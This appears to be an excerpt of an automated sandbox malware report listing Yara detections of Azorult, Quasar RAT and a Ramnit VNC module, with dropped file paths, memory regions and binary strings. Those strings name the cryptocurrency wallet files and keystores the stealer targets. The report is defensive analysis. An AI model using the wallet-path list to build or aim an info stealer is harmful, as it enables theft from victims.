Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Yara detected Azorult

Show sources

Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755481459.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755557311.00000000018A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671626163.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.755386297.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790922233.00000000014D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791563765.0000000001886000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.795274268.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671306839.00000000017E9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671456955.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.790988055.000000000192E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671650973.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.941562165.00000000017DC000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.794854333.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689677970.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.941883221.0000000001557000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671172624.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671475144.00000000017CB000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.791810701.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671495263.0000000001804000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686858693.000000000183D000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.689148939.0000000003800000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671160297.0000000001794000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.938131435.0000000000401000.00000020.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.690115376.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Detected AZORult Info Stealer

Show sources

Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004186C4
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe	Code function: 7_2_004186C4

Yara detected Ramnit VNC Module

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.1924408.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c60000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18f9408.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1833408.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.175f8e0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.18517b0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ae1000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.c9ac50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c60000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.vnc.exe.ae1000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.1808408.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720379201.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.684341973.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.749080496.0000000000AB6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684502731.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.945386236.00000000007C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938281863.0000000000C88000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.938560502.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710171525.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.672198694.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708334830.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.710041588.0000000000C60000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708627891.0000000000C97000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000000.775754648.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.671945982.000000000175C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.720440716.0000000000C9A000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776203238.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938070643.0000000000260000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776024946.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.950447510.0000000000DA6000.00000008.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.938168634.0000000000297000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vnc.exe PID: 6296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost.exe PID: 5200, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: dropped/vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\vnc.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Found many strings related to Crypto-Wallets (likely being stolen)

Show sources

Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: electrum.dat
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: .json,.seco"%APPDATA%\Exodus\2Coins\Jaxx\Local Storage\:%APPDATA%\Jaxx\Local Storage\ Coins\MultiBitHDpmbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml*%APPDATA%\MultiBitHD\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: Coins\Exodus
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: Coins\Ethereum
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: UTC*8%APPDATA%\Ethereum\keystore\
Source: CVbJSUXraQ.exe, 00000001.00000003.686776419.00000000017A3000.00000004.00000001.sdmp	String found in binary or memory: *6%appdata%\Electrum\wallets\$Coins\Electrum-LTC>%appdata%\Electrum-LTC\wallets\

Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR

Remote Access Functionality:

Yara detected Quasar RAT

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match	File source: dropped/windef.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED

Yara detected Ramnit VNC Module

Show sources

Source: Yara match	File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match	File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.svchost.exe.cc5c50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.svchost.exe.cc5c50.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.unpack, type: UNPACKEDPE
